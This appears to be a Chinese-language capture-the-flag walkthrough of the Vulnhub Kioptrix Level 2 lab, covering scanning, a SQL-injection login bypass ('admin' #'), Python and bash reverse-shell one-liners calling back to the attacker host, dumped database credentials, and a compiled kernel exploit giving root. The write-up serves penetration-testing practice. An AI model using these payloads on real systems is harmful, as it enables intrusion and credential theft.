Kioptrix Level 2
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.130 00:0c:29:b2:33:a0 1 60 VMware, Inc.
10.1.1.254 00:50:56:ee:66:c6 1 60 VMware, Inc.
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为10.1.1.130
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.130 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-19 18:20 EST
Nmap scan report for localhost (10.1.1.130)
Host is up (0.0027s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f3e8b1e5863fecf27a318093b52cf72 (RSA1)
| 1024 346b453dbacecab25355ef1e43703836 (DSA)
|_ 1024 684d8cbbb65abd7971b87147ea004261 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 807/udp status
|_ 100024 1 810/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_64_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2023-02-19T21:11:06+00:00; -2h09m38s from scanner time.
631/tcp open ipp CUPS 1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
810/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:B2:33:A0 (VMware)
Host script results:
|_clock-skew: -2h09m38s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.79 seconds
获得Shell
端口3306
──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ mysql -uroot -p -h 10.1.1.130
Enter password:
ERROR 1130 (HY000): Host '10.1.1.143' is not allowed to connect to this MySQL server
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ mysql -uroot -p -h 10.1.1.130
Enter password:
ERROR 1130 (HY000): Host '10.1.1.143' is not allowed to connect to this MySQL server
目标主机的mysql似乎设置了访问白名单
端口80
浏览器访问80端口,返回用户登录界面,貌似存在login bypass漏洞,但尝试了几个失败。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ nikto -h http://10.1.1.130
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.130
+ Target Hostname: 10.1.1.130
+ Target Port: 80
+ Start Time: 2023-02-19 18:25:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8699 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time: 2023-02-19 18:26:35 (GMT-5) (43 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
在尝试破解用户名和密码之前,先看一下有无其他目录或者文件可被利用。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ gobuster dir -u http://10.1.1.130 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.1.1.130
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/02/19 18:28:01 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 283]
/index.php (Status: 200) [Size: 667]
/manual (Status: 301) [Size: 309] [--> http://10.1.1.130/manual/]
/usage (Status: 403) [Size: 283]
/.html (Status: 403) [Size: 283]
Progress: 1102457 / 1102805 (99.97%)
===============================================================
2023/02/19 18:33:49 Finished
===============================================================
端口631
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ searchsploit CUPS 1.1
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CUPS 1.1.x - '.HPGL' File Processor Buffer Overflow | linux/remote/24977.txt
CUPS 1.1.x - Cupsd Request Method Denial of Service | linux/dos/22619.txt
CUPS 1.1.x - Negative Length HTTP Header | linux/remote/22106.txt
CUPS 1.1.x - UDP Packet Remote Denial of Service | linux/dos/24599.txt
CUPS < 1.3.8-4 - Local Privilege Escalation | multiple/local/7550.c
CUPS < 2.0.3 - Multiple Vulnerabilities | multiple/remote/37336.txt
CUPS < 2.0.3 - Remote Command Execution | linux/remote/41233.py
CUPS Server 1.1 - GET Denial of Service | linux/dos/1196.c
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ telnet 10.1.1.130 631
Trying 10.1.1.130...
Connected to 10.1.1.130.
Escape character is '^]'.
^CConnection closed by foreign host.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ searchsploit -m linux/remote/41233.py
Exploit: CUPS < 2.0.3 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/41233
Path: /usr/share/exploitdb/exploits/linux/remote/41233.py
Codes: CVE-2015-1158
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/Vulnhub/Kioptrix2-2/41233.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ python2 41233.py -a 10.1.1.130 -b 631 -f
lol ty google
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py
[*] locate available printer
[-] no printers
破解用户名和密码
gobuster工具没有收集到有价值的目录或者文件,接下来看是否可以突破用户登录
利用一些常见的SQL注入语句,结果下面这句即可成功绕过登录限制
admin' #
成功登录后,为ping命令,那接下来的任务是执行命令得到SHell
which nc没有返回结果,但是which python返回结果,也就是说目标主机没有nc命令,但是可以运行Python
但是
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.1.1.143",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
其实用下面的方法即可得到shell
bash -i >& /dev/tcp/10.1.1.143/5555 0>&1
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.130] 32797
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ python -c 'import pty;pty.spawn("/bin/bash")'
bash-3.00$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 root root 4.0K Oct 8 2009 .
drwxr-xr-x 8 root root 4.0K Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1.7K Feb 9 2012 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
bash-3.00$ cd /home
cd /home
bash-3.00$ ls -alh
ls -alh
total 24K
drwxr-xr-x 4 root root 4.0K Oct 12 2009 .
drwxr-xr-x 23 root root 4.0K Feb 19 16:05 ..
drwx------ 2 harold harold 4.0K Oct 12 2009 harold
drwx------ 2 john john 4.0K Oct 8 2009 john
bash-3.00$ cd harold
cd harold
bash: cd: harold: Permission denied
bash-3.00$ cd john
cd john
bash: cd: john: Permission denied
提权
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
bash-3.00$ cat index.php
cat index.php
<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");
if ($_POST['uname'] != ""){
$username = $_POST['uname'];
$password = $_POST['psw'];
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
//print $query."<br>";
$result = mysql_query($query);
$row = mysql_fetch_array($result);
//print "ID: ".$row['id']."<br />";
找到了数据库连接用户名和密码,试一下是不是shell的密码
bash-3.00$ su - john
su - john
Password: hiroshima
su: incorrect password
bash-3.00$
mysql> show tables;
show tables;
+------------------+
| Tables_in_webapp |
+------------------+
| users |
+------------------+
1 row in set (0.00 sec)
mysql> select * from users;
select * from users;
+------+----------+------------+
| id | username | password |
+------+----------+------------+
| 1 | admin | 5afac8d85f |
| 2 | john | 66lajGGbla |
+------+----------+------------+
2 rows in set (0.00 sec)
mysql> quit
quit
Bye
bash-3.00$ su - john
su - john
Password: 66lajGGbla
su: incorrect password
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]
└─$ searchsploit kernel 2.6 | grep 9545
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Pr | linux/local/9545.c
只能利用本地提权漏洞,只有9545.c可利用
bash-3.00$ gcc -o exploit2 9545.c
gcc -o exploit2 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ chmod +x exploit2
chmod +x exploit2
bash-3.00$ ./exploit2
./exploit2
sh-3.00# cd /root
cd /root
sh-3.00# ls -alh
ls -alh
total 144K
drwxr-x--- 2 root root 4.0K Oct 12 2009 .
drwxr-xr-x 23 root root 4.0K Feb 19 16:05 ..
-rw-r--r-- 1 root root 1.2K Oct 7 2009 anaconda-ks.cfg
-rw-r--r-- 1 root root 215 Feb 9 2012 .bash_history
-rw-r--r-- 1 root root 24 Feb 21 2005 .bash_logout
-rw-r--r-- 1 root root 191 Feb 21 2005 .bash_profile
-rw-r--r-- 1 root root 176 Feb 21 2005 .bashrc
-rw-r--r-- 1 root root 100 Feb 21 2005 .cshrc
-rw-r--r-- 1 root root 53K Oct 7 2009 install.log
-rw-r--r-- 1 root root 3.8K Oct 7 2009 install.log.syslog
-rw------- 1 root root 1.5K Oct 8 2009 .mysql_history
-rw-r--r-- 1 root root 102 Feb 21 2005 .tcshrc
sh-3.00#
经验教训
-
在利用searchsploit查询本地提权漏洞时,有些时候内核的版本不能太明细,否则查询不出相应的漏洞
-
在前一段时间用同样的提权漏洞执行失败,但是这次成功了。